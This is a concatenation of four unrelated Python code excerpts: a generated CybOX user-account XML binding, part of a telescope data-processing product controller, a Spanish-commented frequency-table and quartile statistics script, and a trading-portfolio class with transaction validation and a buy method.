self.Full_Name = Full_Name_
elif nodeName_ == 'Group_List':
obj_ = GroupListType.factory()
obj_.build(child_)
self.set_Group_List(obj_)
elif nodeName_ == 'Home_Directory':
Home_Directory_ = common.StringObjectAttributeType.factory()
Home_Directory_.build(child_)
self.Home_Directory = Home_Directory_
elif nodeName_ == 'Last_Login':
Last_Login_ = common.DateTimeObjectAttributeType.factory()
Last_Login_.build(child_)
self.Last_Login = Last_Login_
elif nodeName_ == 'Privilege_List':
obj_ = PrivilegeListType.factory()
obj_.build(child_)
self.set_Privilege_List(obj_)
elif nodeName_ == 'Script_Path':
Script_Path_ = common.StringObjectAttributeType.factory()
Script_Path_.build(child_)
self.Script_Path = Script_Path_
elif nodeName_ == 'Username':
Username_ = common.StringObjectAttributeType.factory()
Username_.build(child_)
self.Username = Username_
elif nodeName_ == 'User_Password_Age':
User_Password_Age_ = common.DurationObjectAttributeType.factory()
User_Password_Age_.build(child_)
self.User_Password_Age = User_Password_Age_
super(UserAccountObjectType, self).buildChildren(child_, node, nodeName_, True)
# end class UserAccountObjectType
class PrivilegeListType(GeneratedsSuper):
"""The PrivilegeListType type specifies the list of privileges that the
user account has."""
subclass = None
superclass = None
def __init__(self, Privilege=None):
if Privilege is None:
self.Privilege = []
else:
self.Privilege = Privilege
def factory(*args_, **kwargs_):
if PrivilegeListType.subclass:
return PrivilegeListType.subclass(*args_, **kwargs_)
else:
return PrivilegeListType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Privilege(self): return self.Privilege
def set_Privilege(self, Privilege): self.Privilege = Privilege
def add_Privilege(self, value): self.Privilege.append(value)
def insert_Privilege(self, index, value): self.Privilege[index] = value
def export(self, outfile, level, namespace_='UserAccountObj:', name_='PrivilegeListType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='PrivilegeListType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='UserAccountObj:', name_='PrivilegeListType'):
pass
def exportChildren(self, outfile, level, namespace_='UserAccountObj:', name_='PrivilegeListType', fromsubclass_=False):
for Privilege_ in self.get_Privilege():
Privilege_.export(outfile, level, namespace_, name_='Privilege')
def hasContent_(self):
if (
self.Privilege
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='PrivilegeListType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('Privilege=[\n')
level += 1
for Privilege_ in self.Privilege:
showIndent(outfile, level)
outfile.write('model_.PrivilegeType(\n')
Privilege_.exportLiteral(outfile, level, name_='PrivilegeType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Privilege':
type_name_ = child_.attrib.get('{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <Privilege> element')
self.Privilege.append(obj_)
# end class PrivilegeListType
class PrivilegeType(GeneratedsSuper):
"""The PrivilegeType type specifies a specific privilege that a user
has. This is an abstract type since user privileges are
operating-system specific, and is extended as needed in the
derived CybOX object schemas."""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if PrivilegeType.subclass:
return PrivilegeType.subclass(*args_, **kwargs_)
else:
return PrivilegeType(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='UserAccountObj:', name_='PrivilegeType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='PrivilegeType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='UserAccountObj:', name_='PrivilegeType'):
pass
def exportChildren(self, outfile, level, namespace_='UserAccountObj:', name_='PrivilegeType', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='PrivilegeType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class PrivilegeType
class GroupListType(GeneratedsSuper):
"""The GroupListType type specifies the groups that the user account
belongs to."""
subclass = None
superclass = None
def __init__(self, Group=None):
if Group is None:
self.Group = []
else:
self.Group = Group
def factory(*args_, **kwargs_):
if GroupListType.subclass:
return GroupListType.subclass(*args_, **kwargs_)
else:
return GroupListType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Group(self): return self.Group
def set_Group(self, Group): self.Group = Group
def add_Group(self, value): self.Group.append(value)
def insert_Group(self, index, value): self.Group[index] = value
def export(self, outfile, level, namespace_='UserAccountObj:', name_='GroupListType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='GroupListType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='UserAccountObj:', name_='GroupListType'):
pass
def exportChildren(self, outfile, level, namespace_='UserAccountObj:', name_='GroupListType', fromsubclass_=False):
for Group_ in self.get_Group():
Group_.export(outfile, level, namespace_, name_='Group')
def hasContent_(self):
if (
self.Group
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='GroupListType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('Group=[\n')
level += 1
for Group_ in self.Group:
showIndent(outfile, level)
outfile.write('model_.GroupType(\n')
Group_.exportLiteral(outfile, level, name_='GroupType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child | |
If there is a `depends_init` edge from A to B in the graph, A's
request will be made first if `reverse` is false, otherwise B's
request will be made first.
capture_block
The capture block is that being transitioned
"""
# Create a copy of the graph containing only dependency edges.
deps_graph = scheduler.subgraph(self.physical_graph, DEPENDS_INIT)
# Reverse it
if not reverse:
deps_graph = deps_graph.reverse(copy=False)
futures: Dict[object, asyncio.Future] = {} # Keyed by node
# Lexicographical tie-breaking isn't strictly required, but it makes
# behaviour predictable.
now = time.time() # Outside loop to be consistent across all nodes
for node in networkx.lexicographical_topological_sort(deps_graph, key=lambda x: x.name):
reqs: List[KatcpTransition] = []
try:
reqs = node.get_transition(state)
except AttributeError:
# Not all nodes are SDPPhysicalTask
pass
if reqs:
# Apply {} substitutions to request data
subst = dict(capture_block_id=capture_block.name,
time=now)
reqs = [req.format(**subst) for req in reqs]
deps = [futures[trg] for trg in deps_graph.predecessors(node) if trg in futures]
task = asyncio.get_event_loop().create_task(
self._exec_node_transition(node, reqs, deps, state, capture_block))
futures[node] = task
if futures:
# We want to wait for all the futures to complete, even if one of
# them fails early (to give the others time to do cleanup). But
# then we want to raise the first exception.
results = await asyncio.gather(*futures.values(), return_exceptions=True)
for result in results:
if isinstance(result, Exception):
raise result
async def capture_init_impl(self, capture_block: CaptureBlock) -> None:
assert self.telstate is not None
await self.telstate.add('sdp_capture_block_id', capture_block.name)
for node in self.physical_graph:
if isinstance(node, tasks.SDPPhysicalTask):
node.add_capture_block(capture_block)
await self.exec_transitions(CaptureBlockState.CAPTURING, True, capture_block)
async def capture_done_impl(self, capture_block: CaptureBlock) -> None:
await self.exec_transitions(CaptureBlockState.BURNDOWN, False, capture_block)
async def postprocess_impl(self, capture_block: CaptureBlock) -> None:
assert self.telstate is not None
try:
await self.exec_transitions(CaptureBlockState.POSTPROCESSING, False, capture_block)
capture_block.state = CaptureBlockState.POSTPROCESSING
logical_graph = await generator.build_postprocess_logical_graph(
capture_block.configuration, capture_block.name,
self.telstate, self.telstate_endpoint)
physical_graph = self._instantiate_physical_graph(
logical_graph, capture_block.name)
capture_block.postprocess_physical_graph = physical_graph
nodes = {node.logical_node.name: node for node in physical_graph}
telstate_node = nodes['telstate']
telstate_node.host = self.telstate_node.host
telstate_node.ports = dict(self.telstate_node.ports)
# This doesn't actually run anything, just marks the fake telstate node
# as READY. It could block for a while behind real tasks in the batch
# queue, but that doesn't matter because our real tasks will block too.
# However, because of this blocking it needs a large resources_timeout,
# even though it uses no resources.
await self.sched.launch(physical_graph, self.resolver, [telstate_node],
queue=self.batch_queue,
resources_timeout=BATCH_RESOURCES_TIMEOUT)
nodelist = [node for node in physical_graph if isinstance(node, scheduler.PhysicalTask)]
await self.sched.batch_run(physical_graph, self.resolver, nodelist,
queue=self.batch_queue,
resources_timeout=BATCH_RESOURCES_TIMEOUT, attempts=3)
finally:
init_time = capture_block.state_time[CaptureBlockState.CAPTURING]
done_time = capture_block.state_time[CaptureBlockState.BURNDOWN]
observation_time = done_time - init_time
postprocessing_time = time.time() - done_time
POSTPROCESSING_TIME.observe(postprocessing_time)
logger.info('Capture block %s postprocessing finished in %.3fs (obs time: %.3fs)',
capture_block.name, postprocessing_time, observation_time,
extra=dict(capture_block_id=capture_block.name,
observation_time=observation_time,
postprocessing_time=postprocessing_time))
# In unit tests the obs time might be zero, which leads to errors here
if observation_time > 0:
POSTPROCESSING_TIME_REL.observe(postprocessing_time / observation_time)
await self.exec_transitions(CaptureBlockState.DEAD, False, capture_block)
def capture_block_dead_impl(self, capture_block: CaptureBlock) -> None:
for node in self.physical_graph:
if isinstance(node, tasks.SDPPhysicalTask):
node.remove_capture_block(capture_block)
async def _launch_telstate(self) -> katsdptelstate.aio.TelescopeState:
"""Make sure the telstate node is launched"""
boot = [self.telstate_node]
init_telstate = copy.deepcopy(self.physical_graph.graph.get('init_telstate', {}))
init_telstate['subarray_product_id'] = self.subarray_product_id
init_telstate['config'] = self.physical_graph.graph.get(
'config', lambda resolver: {})(self.resolver)
# Provide attributes to describe the relationships between CBF streams
# and instruments. This could be extracted from sdp_config, but these
# specific sensors are easier to mock.
for stream in self.configuration.streams:
if isinstance(stream, product_config.CbfStream):
init_telstate[(stream.name, 'instrument_dev_name')] = stream.instrument_dev_name
if stream.src_streams:
init_telstate[(stream.name, 'src_streams')] = [
src_stream.name for src_stream in stream.src_streams
]
# Load canonical model URLs
model_base_url = self.resolver.s3_config['models']['read']['url']
if not model_base_url.endswith('/'):
model_base_url += '/' # Ensure it is a directory
init_telstate['sdp_model_base_url'] = model_base_url
async with katsdpmodels.fetch.aiohttp.Fetcher() as fetcher:
rfi_mask_model_urls = await _resolve_model(
fetcher, model_base_url, 'rfi_mask/current.alias')
init_telstate[('model', 'rfi_mask', 'config')] = rfi_mask_model_urls[0]
init_telstate[('model', 'rfi_mask', 'fixed')] = rfi_mask_model_urls[1]
for stream in itertools.chain(
self.configuration.by_class(product_config.AntennaChannelisedVoltageStream),
self.configuration.by_class(product_config.SimAntennaChannelisedVoltageStream)):
ratio = round(stream.adc_sample_rate / 2 / stream.bandwidth)
band_mask_model_urls = await _resolve_model(
fetcher, model_base_url,
f'band_mask/current/{stream.band}/nb_ratio={ratio}.alias'
)
prefix: Tuple[str, ...] = (stream.name, 'model', 'band_mask')
init_telstate[prefix + ('config',)] = band_mask_model_urls[0]
init_telstate[prefix + ('fixed',)] = band_mask_model_urls[1]
for group in ['individual', 'cohort']:
config_value = _IndexedKey()
fixed_value = _IndexedKey()
for ant in stream.antennas:
pb_model_urls = await _resolve_model(
fetcher, model_base_url,
f'primary_beam/current/{group}/{ant}/{stream.band}.alias'
)
config_value[ant] = pb_model_urls[0]
fixed_value[ant] = pb_model_urls[1]
prefix = (stream.name, 'model', 'primary_beam', group)
init_telstate[prefix + ('config',)] = config_value
init_telstate[prefix + ('fixed',)] = fixed_value
logger.debug("Launching telstate. Initial values %s", init_telstate)
await self.sched.launch(self.physical_graph, self.resolver, boot)
# connect to telstate store
self.telstate_endpoint = '{}:{}'.format(self.telstate_node.host,
self.telstate_node.ports['telstate'])
redis_client = await aioredis.create_redis_pool(f'redis://{self.telstate_endpoint}')
telstate_backend = katsdptelstate.aio.redis.RedisBackend(redis_client)
telstate = katsdptelstate.aio.TelescopeState(telstate_backend)
self.telstate = telstate
self.resolver.telstate = telstate
# set the configuration
for k, v in init_telstate.items():
key = telstate.join(*k) if isinstance(k, tuple) else k
if isinstance(v, _IndexedKey):
for sub_key, sub_value in v.items():
await telstate.set_indexed(key, sub_key, sub_value)
else:
await telstate.set(key, v)
return telstate
def check_nodes(self) -> Tuple[bool, List[scheduler.PhysicalNode]]:
"""Check that all requested nodes are actually running.
Returns
-------
result
True if all tasks are in state :const:`~scheduler.TaskState.READY`.
died
Nodes that have died unexpectedly (does not include nodes that we
killed).
.. todo::
Also check health state sensors
"""
died = []
result = True
for node in self.physical_graph:
if node.state != scheduler.TaskState.READY:
if node.state == scheduler.TaskState.DEAD and not node.death_expected:
died.append(node)
result = False
return result, died
def unexpected_death(self, task: scheduler.PhysicalTask) -> None:
logger.warning('Task %s died unexpectedly', task.name)
if task.logical_node.critical:
self._go_to_error()
def bad_device_status(self, task: scheduler.PhysicalTask) -> None:
logger.warning('Task %s has failed (device-status)', task.name)
if task.logical_node.critical:
self._go_to_error()
def _go_to_error(self) -> None:
"""Switch to :const:`ProductState.ERROR` due to an external event.
This is used when a failure in some task is detected asynchronously, but
not when a katcp transition fails.
"""
# Try to wind up the current capture block so that we don't lose any
# data already captured. However, if we're in the middle of another
# async operation we just let that run, because that operation is either
# a deconfigure or it will notice the ERROR state when it finishes and
# fail.
#
# Some of this code is copy-pasted from capture_done. Unfortunately
# it's not straightforward to reuse the code because we have to do the
# initial steps (particularly replacement of _async_task) synchronously
# after checking async_busy, rather than creating a new task to run
# capture_done.
if self.state == ProductState.CAPTURING and not self.async_busy:
assert self.current_capture_block is not None
capture_block_id = self.current_capture_block.name
logger.warning('Attempting to terminate capture block %s', capture_block_id)
task = asyncio.get_event_loop().create_task(self._capture_done(error_expected=True))
self._async_task = task
log_task_exceptions(task, logger,
f"Failed to terminate capture block {capture_block_id}")
def cleanup(task):
self._clear_async_task(task)
logger.info('Finished capture block %s on subarray product %s',
capture_block_id, self.subarray_product_id)
task.add_done_callback(cleanup)
# We don't go to error state from CONFIGURING because we check all
# nodes at the end of configuration and will fail the configure
# there; and from DECONFIGURING/POSTPROCESSING we don't want to go to
# ERROR because that may prevent deconfiguring.
if self.state in (ProductState.IDLE, ProductState.CAPTURING):
self.state = ProductState.ERROR
async def _shutdown(self, force: bool) -> None:
# TODO: issue progress reports as tasks stop
await self.sched.kill(self.physical_graph, force=force,
capture_blocks=self.capture_blocks)
async def configure_impl(self) -> None:
try:
try:
resolver = self.resolver
resolver.resources = SDPResources(self.master_controller, self.subarray_product_id)
# Register static KATCP sensors.
for ss in self.physical_graph.graph["static_sensors"].values():
self.add_sensor(ss)
# launch the telescope state for this graph
telstate = await self._launch_telstate()
# launch containers for those nodes that require them
await self.sched.launch(self.physical_graph, self.resolver)
alive, died = self.check_nodes()
# is everything we asked for alive
if not alive:
fail_list = ', '.join(node.logical_node.name for node in died) or 'Some nodes'
ret_msg = (f"{fail_list} failed to start. "
"Check the error log for specific details.")
logger.error(ret_msg)
raise FailReply(ret_msg)
# Record the TaskInfo for each task in telstate, as well as details
# about the image resolver.
details = {}
for task in self.physical_graph:
if isinstance(task, scheduler.PhysicalTask):
details[task.logical_node.name] = {
'host': task.host,
'taskinfo': _redact_keys(task.taskinfo, resolver.s3_config).to_dict()
}
await telstate.add('sdp_task_details', details, immutable=True)
await telstate.add('sdp_image_tag', resolver.image_resolver.tag, immutable=True)
await telstate.add('sdp_image_overrides', resolver.image_resolver.overrides,
immutable=True)
except BaseException as exc:
# If there was a problem the graph might be semi-running. Shut it all down.
await self._shutdown(force=True)
raise exc
except scheduler.InsufficientResourcesError as error:
raise FailReply('Insufficient resources to launch {}: {}'.format(
self.subarray_product_id, error)) from error
except scheduler.ImageError as error:
raise FailReply(str(error)) from | |
<gh_stars>0
from cgi import print_arguments
from dataclasses import dataclass
import math
from operator import index
from pyexpat.errors import XML_ERROR_XML_DECL
from re import T
from typing import Tuple
import matplotlib.pyplot as plt
from numpy import percentile
import seaborn as sns
import pandas as pd
import random
# VALORES
dataSet = [0,2,3,4,5,11,12,13,14,15,16,17,18,19,21,21,21,21,21,23,23,23,23,23,25,25,25,25,25,26,26,26,26,26,29,29,29,29,29,35,35,35,35,35,35,35,35,35,35,36,36,36,36,36,36,36,36,36,36,36,31,31,31,31,31,31,31,31,31,31,32,32,41,41,41,41,41,42,42,42,42,42,45,45,45,45,45,46,46,46,46,46,48,48,48,48,48,48,51,52,53,54,55,56,57,60]
minV = 120; maxV = 200; n = 30
#dataSet = [random.randint(minV,maxV) for _ in range(n)]
# si quieres valores aleatorios quitale el "#" a la linea de arriba
UsarOpcion = False # Cambiar por "True" sin comillas para usar esa opción
# Si ya te dan la tabla llena estos datos
#A = amplitud ; K = numero de clases o "filas" de la tabla; ValorMinimo = primer limite inferior
A = 14; K = 6; ValorMinimo = 120
frecueciaAbsoluta = [7,5,5,5,4,4] # llena la frecuencia absoluta
Percentiles = [n for n in range(1,101)]
class Stats:
def __init__(self,UsarOpcion,dataSet = []) -> None:
self.dataSet = dataSet
dataSet.sort()
self.NotificationLastInterval = False
self.WithoutNumbers = UsarOpcion
def getParameters(self,A = 0 , K = 0, valorMinimo = 0,frecueciaAbsoluta = []):
if self.WithoutNumbers == False:
self.maxVal = max(self.dataSet) # obtenemos el valor máximo
self.minVal = min(self.dataSet) # obtenemos el valor mínimos
self.R = self.maxVal - self.minVal # obtenemos rango
self.K = math.ceil(1+ 3.332*math.log10(len(self.dataSet))) # obtenemos intervalo de clase y lo redondeamos 1+ 3.332 * log10(n)
K = math.ceil(1+ 3.332*math.log10(len(self.dataSet)))
A = self.R / self.K # obtenemos amplitud R/K
# print((math.ceil(A) * K) + min(dataSet) > (max(dataSet) + 1))
if math.floor(A) * K + min(self.dataSet) > max(self.dataSet): # si redondeamos hacia abajo
self.A = math.floor(A)
elif math.ceil(A) * K + min(self.dataSet) > max(self.dataSet): # ceil case
self.A = math.ceil(A)
else:
self.A = math.ceil(A)
self.NotificationLastInterval = True
else:
self.minVal = valorMinimo
self.A = A
self.K = K
valorMaximo = valorMinimo + (A * K)
self.R = valorMaximo - valorMinimo
lenDataSet = sum(frecueciaAbsoluta)
dataSet = [n for n in range(lenDataSet)]
self.dataSet = dataSet
def getIntervals(self):
print(self.dataSet)
startingLim = self.minVal #seteamos limite inferior
self.intervalos = []
for _ in range(int(self.K)): #creamos K itervalos
limInf = startingLim
limSup = limInf + self.A #obtenemos limite superior sumando A a lim Inferior
startingLim = limSup # setemaos el nuevo limite inferior
self.intervaloActual = f"{limInf}-{limSup}"
self.intervalos.append([[limInf,limSup],0]) #array con el intervalo y su frecuencia absoluta
if self.NotificationLastInterval == True:
lastInterval = len(self.intervalos) - 1
self.intervalos[lastInterval][0][1] +=1
def getFrequency(self):
if self.WithoutNumbers == False:
self.freqNums = {} #diccionario con todos los numeros y sus frecuencias
# print(dataSet)
vals = list(set(dataSet)) # eliminamos repetidos y nos quedamos con los valores
vals.sort()
for val in vals:
self.freqNums[f"{val}"] = 0 # creamos diccionario por default frecuencia = 0
for n in dataSet:
self.freqNums[f"{n}"] += 1 # iteramos por los valores cada que encotramos un valor sumamos uno
# print(self.freqNums)
def marcaDeClase(self):
self.marcaDeClase = [ (intervalos[0][0] + intervalos[0][1])/ 2 for intervalos in self.intervalos ]
if self.NotificationLastInterval == True:
self.marcaDeClase[len(self.marcaDeClase) - 1] = (max(dataSet) + (max(dataSet) - self.A)) / 2
def analize(self,frecueciaAbsoluta = []):
if self.WithoutNumbers == False:
Finished = False #control vars
iterFreq = 0 #aumenta para obtener valores del diccionario de frecuencias self.freqNums = {}
iterIntervals = 0 #aumenta para llegar a un nuevo intervalo self.intervalos
freqVals = [int(k) for k,v in self.freqNums.items()] # obtenemos solo los numeros del diccionario self.freqNums = {}
intervals = [interval[0] for interval in self.intervalos] # obtenemos solo los intervalos del array self.intervalos
# print(intervals)
while Finished == False:
try:
currentInterval = intervals[iterIntervals] # obtenemos el intervalo con el que trabajamos en el ciclo
currentFeqVal = freqVals[iterFreq] # obtenemos el valor a comparar
if currentFeqVal >= currentInterval[0] and currentFeqVal < currentInterval[1]: # validation
freqCurrentVal = self.freqNums[f"{currentFeqVal}"] # unavez encontrada el intervalo correcto
# obtenemos la frecuencia de ese numero
# print(currentInterval,currentFeqVal,freqCurrentVal)
self.intervalos[iterIntervals][1] += freqCurrentVal # accedemos al intervalo acutal en el array self.intervalos y le sumamos
# la frecuencia del número actual
iterFreq += 1 # pasamos al siguiente valor
else: iterIntervals += 1 # si no se encuentra en ese intervalo avanzamos
except:
Finished = True
else:
for valor in range(len(self.intervalos)):
self.intervalos[valor][1] = frecueciaAbsoluta[valor]
def frecuenciaAcumalada(self):
cache = 0
freqAbs = [interval[1] for interval in self.intervalos]
self.frecuenciaAcumulada = []
for n in freqAbs:
cache += n
self.frecuenciaAcumulada.append(cache)
def FrecuenciaRelativa(self):
self.FrecuencieRelativa = []
N = len(self.dataSet)
for freq in [interval[1] for interval in self.intervalos]:
val = freq / N
self.FrecuencieRelativa.append(val)
def FrecuenciaPorcentual(self):
self.FrecuenciaPorcentual = []
for n in self.FrecuencieRelativa:
freq = n * 100
self.FrecuenciaPorcentual.append(freq)
def calcXF(self): #media
XF = []
for n in range(len(self.marcaDeClase)):
xfCurrentn = self.marcaDeClase[n] * self.intervalos[n][1]
XF.append(xfCurrentn)
X = sum(XF) / len(self.dataSet)
len(self.dataSet)
self.XF = XF
self.X = X
def calc2(self): # (X - Xi)**2 (marca de clase - media) ** 2
X_X2 = []
for n in self.marcaDeClase:
currentVal = (self.X - n)**2
X_X2.append(currentVal)
self.X_X2 = X_X2
def calc3(self): # (X - Xi)² * f
X_X2_F = []
for n in range(len(self.X_X2)):
currentVal = self.X_X2[n] * self.intervalos[n][1]
X_X2_F.append(currentVal)
self.X_X2_F = X_X2_F
def calquartils(self):
quartils = {}
for q in range(1,5):
first = (q*len(self.dataSet))/4
if first in self.frecuenciaAcumulada:
valor = self.frecuenciaAcumulada.index(first)
quartil = self.intervalos[valor][0]
quartils[f"{q}"] = quartil[1] #limite superior
else:
for n in range(len(self.frecuenciaAcumulada)):
try:
freq1 = self.frecuenciaAcumulada[n]
freq2 = self.frecuenciaAcumulada[n+1]
if self.frecuenciaAcumulada[n] < first and first < self.frecuenciaAcumulada[n+1]:
intervalos = [self.frecuenciaAcumulada[n],self.frecuenciaAcumulada[n+1]]
LimInf = self.intervalos[self.frecuenciaAcumulada.index(intervalos[1])][0][0]
Kn = (n*len(self.dataSet)) / 4
quartil = (((Kn - intervalos[0]) / (intervalos[1] - intervalos[0]) * self.A)) + LimInf
quartils[f"{q}"] = quartil
intervalos = []
except: pass
self.quartils = quartils
def caldecils(self):
decils = {}
for q in range(1,11):
first = (q*len(self.dataSet))/10
if first in self.frecuenciaAcumulada:
valor = self.frecuenciaAcumulada.index(first)
quartil = self.intervalos[valor][0]
decils[f"{q}"] = quartil[1] #limite superior
else:
for n in range(len(self.frecuenciaAcumulada)):
try:
freq1 = self.frecuenciaAcumulada[n]
freq2 = self.frecuenciaAcumulada[n+1]
if self.frecuenciaAcumulada[n] < first and first < self.frecuenciaAcumulada[n+1]:
intervalos = [self.frecuenciaAcumulada[n],self.frecuenciaAcumulada[n+1]]
LimInf = self.intervalos[self.frecuenciaAcumulada.index(intervalos[1])][0][0]
Kn = (q*len(self.dataSet)) / 10
quartil = (((Kn - intervalos[0]) / (intervalos[1] - intervalos[0]) * self.A)) + LimInf
decils[f"{q}"] = quartil
intervalos = []
except: pass
print("\n\n")
self.decils = decils
def createTable(self):
Table = pd.DataFrame()
Table["Intervalos"] = [f"{interval[0][0]}-{interval[0][1]}" for interval in self.intervalos]
Table["Marca de Clase"] = self.marcaDeClase
Table["Frecuencia Absoluta"] = [interval[1] for interval in self.intervalos]
Table["Frecuencia Acumulada"] = self.frecuenciaAcumulada
Table["Frecuencia Relativa"] = self.FrecuencieRelativa
Table["Frecuencia Porcentual"] = self.FrecuenciaPorcentual
Table["X * Fi"] = self.XF
Table["(Xi - X)²"] = self.X_X2
Table["(Xi - X)² * f"] = self.X_X2_F
Table= Table.append({
'Intervalos': "Total",
'Marca de Clase' : "-",
'Frecuencia Absoluta' : sum([interval[1] for interval in self.intervalos]) ,
'Frecuencia Relativa' : sum(self.FrecuencieRelativa),
'Frecuencia Porcentual' : sum(self.FrecuenciaPorcentual),
'Frecuencia Acumulada' : "-",
'X * Fi' : sum(self.XF),
'(Xi - X)²' : sum(self.X_X2),
'(Xi - X)² * f' : sum(self.X_X2_F)
} , ignore_index=True)
Table.to_csv('tablaDeFrecuencia.csv')
def calcMedian(self):
x = (len(self.dataSet) % 2)
if len(self.dataSet) % 2 != 0:
n2 = (len(self.dataSet) + 1) / 2
else: n2 = len(self.dataSet) / 2
for n in range(len(self.frecuenciaAcumulada)):
try:
freq1 = self.frecuenciaAcumulada[n]
freq2 = self.frecuenciaAcumulada[n+1]
if self.frecuenciaAcumulada[n] < n2 and n2 < self.frecuenciaAcumulada[n+1]:
intervalos = [self.frecuenciaAcumulada[n],self.frecuenciaAcumulada[n+1]]
LimInf = self.intervalos[self.frecuenciaAcumulada.index(intervalos[1])][0][0]
freqAbsPos = self.frecuenciaAcumulada.index(intervalos[1])
freqAbs = self.intervalos[freqAbsPos][1]
median = LimInf + (((n2 - intervalos[0]) / freqAbs)) * self.A
self.median = median
except: pass
def calcMode(self):
freq = [interval[1] for interval in self.intervalos]
freqValModa = max(freq)
positionModa = freq.index(freqValModa)
limInf = self.intervalos[positionModa][0][0]
try:freqAnterior = freq[positionModa -1]
except: freqAnterior = 0
try: freqPost = freq[positionModa + 1]
except: freqPost = 0
moda = limInf + ( (freqValModa - freqAnterior) / ( (freqValModa - freqAnterior ) + (freqValModa - freqPost) ) )*self.A
self.moda = moda
def createValueCsv(self):
values = pd.DataFrame()
values["Rango (R)"] = [self.R]
values["Amplitud (A)"] = [self.A]
values["Numero de clases (K)"] = [self.K]
values["Varianza (S²)"] = [sum(self.X_X2_F) /len(self.dataSet)]
values["Desviación Estándar"] = [math.sqrt(sum(self.X_X2_F) /len(self.dataSet) )]
values["Coeficiente de variación "] =[math.sqrt(sum(self.X_X2_F) /len(self.dataSet) ) / | |
transaction
quantity:
The transaction quantity of the involved asset
short:
Whether the transaction is short or long (True is short, False
is long)
Returns:
A boolean value indicating the validity of the transaction.
Raises:
ValueError:
When the transaction quantity is below 0. A transaction quantity
is bounded at 0.
ValueError:
When the date of the asset's most recent valuation does not
match the current date of the portfolio.
ValueError:
When trying to perform a transaction with an asset whose market
is currently closed
"""
if not short:
if isinstance(asset, Currency) and asset.is_base:
return False
elif quantity == 0:
return False
if quantity < 0:
raise ValueError(
"Purchase quantity must be or exceed 0, " f"received {quantity}"
)
elif asset.date != self.date:
raise ValueError(
"Unable to complete transaction, "
f"{asset.date=} does not match "
f"{self.date=}. Please ensure portfolio "
"and asset dates are synced"
)
elif (asset.market_open != asset.market_close) and (
asset.date.time() > asset.market_close
or asset.date.time() < asset.market_open
):
raise ValueError(
f"Unable to complete transaction for {asset=} because the "
"market is closed. Market close is "
f"{utils.timestring(asset.market_close)}, time of last "
f"valuation is {utils.timestring(asset.date)}"
)
return True
def buy(self, asset: Asset, quantity: float) -> None:
"""
Buys an asset using this portfolio
Creates a long position in the given asset with a purchase volume
given by 'quantity'.
Parameters:
asset:
The asset in which to create a long position
quantity:
The purchase quantity
Returns:
TODO: Return the created/altered position
"""
# Ensure that the transaction can occur
if not self.validate_transaction(asset, quantity):
return
# Creating the position to be entered into
position = Position(asset, quantity)
if position.value > self.cash:
raise ValueError(
f"Purchasing {quantity} units of " # type: ignore[attr-defined]
f"{asset.name} {asset.type} requires "
f"{Cash(position.value, position.asset.base)}, "
f"but this portfolio only has {self.cash} "
"in reserve"
)
